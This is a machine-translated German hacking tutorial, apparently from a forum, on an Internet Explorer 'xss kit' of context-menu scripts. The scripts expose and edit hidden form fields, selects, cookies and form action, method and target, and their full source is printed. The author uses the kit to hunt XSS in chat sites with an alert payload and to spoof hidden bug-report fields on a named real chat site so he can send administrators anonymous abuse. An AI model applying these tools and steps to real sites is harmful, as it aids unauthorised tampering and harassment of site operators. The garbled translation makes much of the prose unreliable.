Ich habe mich hier entschlossen, eine Reihe von Tools für xss zu betrachten, die auf der Anti-Chat-Website liegen. Download IE xss kit Ein weiteres kleines Vorwort. Ich habe das alles in diesem Abschnitt zurückgezahlt. Dieser Satz wird bei der Suche nach Schwachstellen im Chat helfen und Ihre Chancen leicht erhöhen. Heute werde ich kurz über den Formular-Editor informieren:

Form_Select-one2Text

Dieser Formular-Editor ermöglicht es uns, Frames mit verdrahteten Optionen in unsere eigene Test-Website zu drehen.

Lassen Sie uns mit dem einfachsten beginnen, in den meisten chats gibt es eine wahl der farbe, die in der html form ist auf diese Weise getan:

  <OPTION ausgewählt VALUE = "Black" STYLE = "color: black"> Black </ OPTION> In der Tat sieht es so aus:
IPB-Bild Wie Sie sehen können, gibt es verdrahtete Farben, die Verwendung von anderen ist noch nicht möglich. 
 Jetzt bringen wir den Mauszeiger mit der Farbwahl auf den Rahmen, 
 Klicken Sie mit der rechten Maustaste und wählen Sie den Befehl Form_Select-one2Text
 
 Und dieser Rahmen mit einer strengen Farbwahl wird ein leerer Rahmen mit der Möglichkeit, irgendeinen Text dort zu schreiben. 
 (Nicht alles, was du schreibst, wird funktionieren). 
 Hier ist, wie es sich um die Anwendung von Form_Select-one2Text kümmert :
IPB-Bild Jetzt können Sie jeden Farbcode eingeben, zB #FFFFFF. 
 Auch dieser Befehl macht viele Frames frei für die Bearbeitung. 
 (Zum Beispiel, in einem Chat mit der Wahl des Geschlechts, machte ich mir einen "Nightmare Hermofrodit"). 
 Sie können auch direkt nach xss-Schwachstellen suchen und diesen Code in den Frames, die uns zur Verfügung stehen, ersetzen.
 Hier sind eine Menge von Codes, die eine Warnung auslösen können und tatsächlich finden xss. 
 Jetzt sind Sie mit dem Formular-Editor Form_Select-one2Text vertraut



Form_Method2Text, Form_Hidden2Text

Beginnen wir mit Form_Method2Text . Der Befehl selbst ist nicht sehr notwendig, weil Es öffnet den Rahmen, wo die Methode der Arbeit mit der Seite geschrieben wird. Die grundlegendsten Methoden sind: post und get. Die Post-Methode bedeutet, dass Sie Ihre Daten auf der Seite eingeben. Meistens kommt es auf Foren, Gästebüchern, Chatrooms etc. vor. Die Get-Methode bedeutet, dass Sie irgendwelche Daten von der Seite selbst erhalten, am häufigsten wird es in Suchmaschinen verwendet, diese Methode kann fast überall gefunden werden. Im Allgemeinen ist dieser Befehl nicht bemerkbar, aber es genauso wie der Rest gibt Zugriff auf einen offenen Rahmen. Und natürlich in einigen Internet-Ressourcen, wenn Sie den Beitrag ersetzen oder den xss-Code erhalten, wird das JavaScript erfolgreich ausgeführt.

Gehen Sie nun durch den Befehl Form_Hidden2Text . Mit diesem Befehl können Sie Daten anzeigen, die auf der Seite geschützt sind (sortiert) und erlaubt, sie anzupassen.

Ich zeige Ihnen ein illustratives Beispiel. Ich habe diese Methode auf einem der Chatsichi Chatrooms getestet, wenn ich einen Fehlerbericht senden muss.

  Hier ist es: http://www.38557.chatcity.ru/bug/?err=IllegalChannel(get_ch)&www.38557.chatcity.ru&
 Bildschirm Ich werde nicht tun, tk.  Gehen Sie zum Link und sehen Sie selbst. 
 Jetzt auf dieser Seite verwenden wir den Befehl Form_Hidden2Text , 
 Wie Sie sehen können, werden die Frames mit den Daten des Benutzers geöffnet, die zu dieser Seite gelangt sind. 
 (Sie sind auch in der Art) Jetzt können sie bearbeitet werden, ich werde erklären, warum. 
 Beim Senden eines Fehlerberichts an den Administrator des Chats kommen die gleichen Daten 
 Die uns zur Bearbeitung zur Verfügung gestellt wurde. 
 Dies deutet darauf hin, dass Sie dieses Mal anonym bleiben können.  Hier ist der Bildschirm von dem, was wir entdeckt haben:
IPB-Bild Wie Sie sehen können, können Sie alles löschen oder die Daten anderer Personen ersetzen.
 Und das ist das gleiche in den Sorten gespeichert:
<input type=hidden name=err value="IllegalChannel(get_ch)"> <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"> <input type=hidden name=addr value="айпи мой :) )"> <input type=hidden name=via value=""> <input type=hidden name=referer value="http://www.38557.chatcity.ru/kpobatka"> <input type=hidden name=args value="www.38557.chatcity.ru&">

 Aber jetzt können wir alle bearbeiten und bleiben anonym, schreiben an die Verwaltung ein paar liebevoll

 Das ist alles, was diese beiden Teams machen können.


Form_Target2Text

Von sich aus bedeutet das Wort Ziel das Ziel, und das bedeutet, dass dies Ihre weitere "Richtung" nach einer Aktion ist. Und in diesem Fall, wenn wir diesen Befehl verwenden, haben wir auch einen Rahmen für die Bearbeitung zugänglich. In vielen Fällen (wenn das Ziel nicht in JavaScript registriert ist), wenn du den Befehl benutzt, wirst du einen Link sehen, den du nach einigen Aktionen verschickt hast. Es kann zumindest das sein, wenn du auf OK klickst, Exit, etc. In diesem Fall ist der Befehl Form_Target2Text sehr praktisch für die Suche nach Xss. Sie können xss-Code zu einem Link zuweisen, der bereits war, oder einfach nur den Link löschen und den xss-Code registrieren.

LocationReplace

Wenn dieser Befehl ausgeführt wird, wird das Skript über die Aufforderungsmethode angefordert, die Anforderung geht zu einer Seite. Im Allgemeinen werde ich nicht um den Busch herumgehen, dieser Befehl ist bei der Suche nach xss ganz nutzlos, weil So dass du nicht schreibst, wird jeder deiner Text der ursprünglichen Adresse der Seite hinzugefügt, von der du den Befehl ausgeführt hast.

  Beispiel: _http: //www.ya.ru/
 Wir benutzen LocationReplace , das Fenster fällt aus, wir betreten dort einen einfachen Aufbau:

 <Script> Alert (/ Test /) </ script>

 Wir drücken OK, und wir sind umgezogen: http://www.ya.ru/ <script> alert (/ test /) </ script>

 Kein Sinn für diese, die zu faul sind, um in den Adress-Barcode zu schreiben und nicht mehr. 
 Es kann auch als Referer verwendet werden.


Alle HTML-Codes, die vom Set von IE xss Kit betrieben werden.


Kekse:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('New Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script>



Action2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zAction) { innerHTML = '<input type="text" id="zAction" value="' + zConvert(action) + '" title="action" onChange="document.forms[' + i + '].action = this.value">' + innerHTML; } } } </script>



Checkbox2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'checkbox') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



VeranstaltungenOFF:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var ii in zForms[i]) { if (ii.match(/^on/i) && (zForms[i].getAttribute(ii) != null)) { zForms[i].setAttribute(ii, null); } } for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { for (var jj in zForms[i].elements[j]) { if (jj.match(/^on/i) && (zForms[i].elements[j].getAttribute(jj) != null)) { zForms[i].elements[j].setAttribute(jj, null); } } } } </script>



Hidden2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'hidden') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Methode2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zMethod) { innerHTML = '<input type="text" id="zMethod" value="' + zConvert(method) + '" title="method" onChange="document.forms[' + i + '].method = this.value">' + innerHTML; } } } </script>



Radio2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'radio') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



Select-One2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Target2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zTarget) { innerHTML = '<input type="text" id="zTarget" value="' + zConvert(target) + '" title="target" onChange="document.forms[' + i + '].target = this.value">' + innerHTML; } } } </script>



LocationReplace:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zLocation = zWindow.location; var zNewLocation = zWindow.prompt('New Location:', zLocation); if (zNewLocation != null) zLocation.replace(zNewLocation); </script>